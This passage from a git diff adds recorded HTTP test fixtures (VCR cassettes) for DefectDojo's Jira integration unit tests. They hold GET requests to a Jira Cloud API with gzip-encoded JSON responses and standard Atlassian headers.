keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:14 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 491ace8d-200d-4010-bb37-b848b2753afe + x-envoy-upstream-service-time: + - '56' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/serverInfo + response: + body: + string: !!binary | + H4sIAAAAAAAAA0yPQUvEMBCF/0uuttlJNmm3uYkeVGQV2j2JSNpOsJImpU2FZdn/boKL623em+/N + Y06k1QseZksU+QxhWtRm06PBLvT+y1MdrF6WQTvqMJCMfOO8DN5FmAEwChTyen/7Wj+8NNftfh3b + OBH1lqAMMnjPSI+T9ccRXWiOE8YDd9avfQy162D73whRKSDFxbzXIYEcOMuB57xoGFO8VFtBAeAG + IhzzC86xtxnGK7vNgTUclJCKCcol/2O78dEZH0FRSFkaZgyi2FWV0SJp1KzkhdzxKLjsqqL6VxBs + angaZk3SO0avNjz7Tif7ROxlIug+DjU5n38AAAD//wMAFMQTploBAAA= + headers: + ATL-TraceId: + - 747af66ce977810f + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:14 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 51f1ef3e-b3cb-43f0-9a6b-98847f87f094 + x-envoy-upstream-service-time: + - '33' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + 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 + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - 35d7bc0eadf50b8f + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:14 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 08544f6e-eb40-4807-9ef7-28d09c53c638 + x-envoy-upstream-service-time: + - '99' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + 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 + wKGuu74AAAD//wMANYTZQH1HAAA= + headers: + ATL-TraceId: + - d21efaa95a4d9866 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:14 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - d0c169a4-0ec1-4a6f-a5a0-cab6dd200c51 + x-envoy-upstream-service-time: + - '60' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/latest/issue/NTEST-460 + response: + body: + string: !!binary | + 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 + headers: + ATL-TraceId: + - ab4b398b1151fafc + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:14 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - b149f686-a2a1-4e16-b710-46db3518daec + x-envoy-upstream-service-time: + - '205' + status: + code: 200 + message: OK +version: 1 diff --git a/unittests/vcr/jira/JIRAConfigAndPushTestApi.test_engagement_epic_mapping_enabled_create_epic_and_push_findings.yaml b/unittests/vcr/jira/JIRAConfigAndPushTestApi.test_engagement_epic_mapping_enabled_create_epic_and_push_findings.yaml new file mode 100644 index 00000000000..54e8cccf48a --- /dev/null +++ b/unittests/vcr/jira/JIRAConfigAndPushTestApi.test_engagement_epic_mapping_enabled_create_epic_and_push_findings.yaml @@ -0,0 +1,2205 @@ +interactions: +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/serverInfo + response: + body: + string: !!binary | + H4sIAAAAAAAAA0yPQUvEMBCF/0uuttlJtmm3uYkeVGQV2j2JSNpOsJImpUmFZdn/boKL623mzffe + Y06kUx4PiyGSfIYwe7nZDKixD4P7clQFo7wflaUWA8nINy5+dDbCDIBRoJA3+9vX5uGlvV7369TF + ici3BGWQwXtGBpyNO05oQ3ucMQbcGbcO0dStoxl+LUQmgygu4r0KCeTAWQ4852XLmOSV3BYUAG4g + wtHvcYm97Thd2W0OrOUgCyGZoDHxj+2nR6tdBItSiEozrRGLXV1rVaQdFat4KXY8Llz0dVn/Kwgm + NTyNiyLpHa1WE55dr5J8IuYyEbQfh4aczz8AAAD//wMAQrbvqFoBAAA= + headers: + ATL-TraceId: + - e80a1c9833a375d6 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:15 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 05c392d6-dd20-436d-ab1a-8ec981dadc6a + x-envoy-upstream-service-time: + - '27' + status: + code: 